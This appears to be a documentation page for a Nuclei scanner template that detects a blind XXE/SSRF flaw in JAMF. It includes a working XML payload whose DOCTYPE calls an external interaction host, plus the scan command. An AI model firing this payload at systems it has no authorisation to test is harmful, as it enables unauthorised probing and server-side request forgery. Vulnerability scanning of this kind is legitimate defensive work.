Skip to content
Nuclei Templates

JAMF Blind XXE / SSRF

ID: jamf-blind-xxe

Severity: medium

Author: pdteam

Tags: xxe,ssrf,jamf

Description

Section titled “Description”

Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations.

YAML Source

Section titled “YAML Source”
id: jamf-blind-xxe


info:
  name: JAMF Blind XXE / SSRF
  author: pdteam
  severity: medium
  description: Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations.
  reference:
    - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  metadata:
    max-request: 1
  tags: xxe,ssrf,jamf


http:
  - raw:
      - |
        POST /client HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml


        <?xml version='1.0' encoding='UTF-8' standalone="no"?>
        <!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
        <ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
          <device>
            <uuid>&test;</uuid>
            <macAddresses />
          </device>
          <application>com.jamfsoftware.jamfdistributionserver</application>
          <messageTimestamp>{{unix_time()}}</messageTimestamp>
          <content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
            <uuid>00000000-0000-0000-0000-000000000000</uuid>
            <commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
            <status>
              <code>1999</code>
              <timestamp>{{unix_time()}}</timestamp>
            </status>
            <commandData>
              <distributionServerInventory>
                <ns2:distributionServerID>34</ns2:distributionServerID>
              </distributionServerInventory>
            </commandData>
          </content>
        </ns2:jamfMessage>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"


      - type: word
        words:
          - "com.jamfsoftware.jss"
# digest: 4b0a00483046022100d3d075592a8fda1d003cd3943616399f501875e435c406610cf13f4c48c9378f0221009aec5515841c62ad08c800aeb677efd98fb5189e0b28c162ecf4a4bbf9f28d38:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/jamf/jamf-blind-xxe.yaml"

View on Github